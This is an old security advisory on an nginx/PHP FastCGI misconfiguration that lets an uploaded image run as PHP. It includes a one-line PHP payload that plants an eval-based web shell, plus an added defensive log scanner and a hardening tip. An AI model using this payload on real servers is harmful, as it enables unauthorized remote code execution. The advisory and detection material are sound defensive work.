Nginx version 0.7.65 suffers from a configuration vulnerability that may allow for a shell upload.
# Exploit Title : Nginx Server Configuration hole ; Upload file execute
# Software link : http://nginx.org/
# Version : Confirmed in nginx v0.7.65. (And PHP v5.3.2 with Suhosin patch and extension).
# Tested on : Windows 7
# Date : 29/07/2011
# Author : sysmox.com
# Website : http://www.sysmox.com
# Email : info_at_sysmox.com
Millions of sites run the Nginx project, and I also like it. It has excellent
options, and it has recently become popular for the volume of work and
development going into the code.
Nginx suffers from a widespread flaw that could lead to serious damage and be
exploited by malicious hackers to gain access to the affected system.
If your configuration is set up for nginx + PHP + CGI like this:
    location ~ \.php$ {
        root html;
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
        include fastcgi_params;
    }
For example, a user browses to http://www.site.com/sys.php, where the link
would be /sys.jpg/sys.php.
SCRIPT_FILENAME would become /scripts/sys.jpg and PATH_INFO would become
sys.php. That means somebody who has uploaded a jpg file can execute it as
PHP.
The contents of the jpg file can be like:
<?fputs(fopen(shell.PHP,w ),<?eval(\$_POST[akt]);?>)?>
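
For defenders, the request shape described above (a static file segment followed by a trailing .php segment, as in /sys.jpg/sys.php) can be searched for in access logs. The following is an added example, not part of the original advisory; the extension list, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed list of extensions an upload feature accepts; adjust per site.
STATIC_EXT = {"jpg", "jpeg", "png", "gif", "txt", "pdf", "css", "js", "ico"}

# Request and status fields of a combined-format access log line.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def split_static_then_php(path):
    """Return (file, trailing) when a static-file segment is followed by a
    trailing *.php segment, as in /sys.jpg/sys.php; otherwise None."""
    path = unquote(path)  # also catches an encoded slash (%2F)
    if not path.lower().endswith(".php"):
        return None  # would not reach the `location ~ \.php$` block
    segments = path.split("/")
    for i, seg in enumerate(segments[:-1]):
        ext = seg.rsplit(".", 1)[-1].lower() if "." in seg else ""
        if ext in STATIC_EXT:
            return "/".join(segments[:i + 1]), "/".join(segments[i + 1:])
    return None

def scan(lines):
    """Return (status, file, trailing) for every suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        split = split_static_then_php(urlsplit(m.group("target")).path)
        if split:
            hits.append((m.group("status"), *split))
    return hits

# Constructed sample log lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Jul/2011:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [29/Jul/2011:10:00:02 +0000] "GET /uploads/sys.jpg HTTP/1.1" 200 2048',
    '203.0.113.5 - - [29/Jul/2011:10:00:03 +0000] "GET /uploads/sys.jpg/sys.php HTTP/1.1" 200 17',
    '203.0.113.5 - - [29/Jul/2011:10:00:04 +0000] "GET /img/a.PNG%2Fx.php?x=1 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for status, file, trailing in scan(SAMPLE_LOG):
        print(f"status={status} file={file} trailing={trailing}")
```

A hit answered with status 200 is the case to investigate first. A common hardening for the location block shown earlier is to add try_files $uri =404; so that requests for scripts that do not exist on disk are never passed to FastCGI.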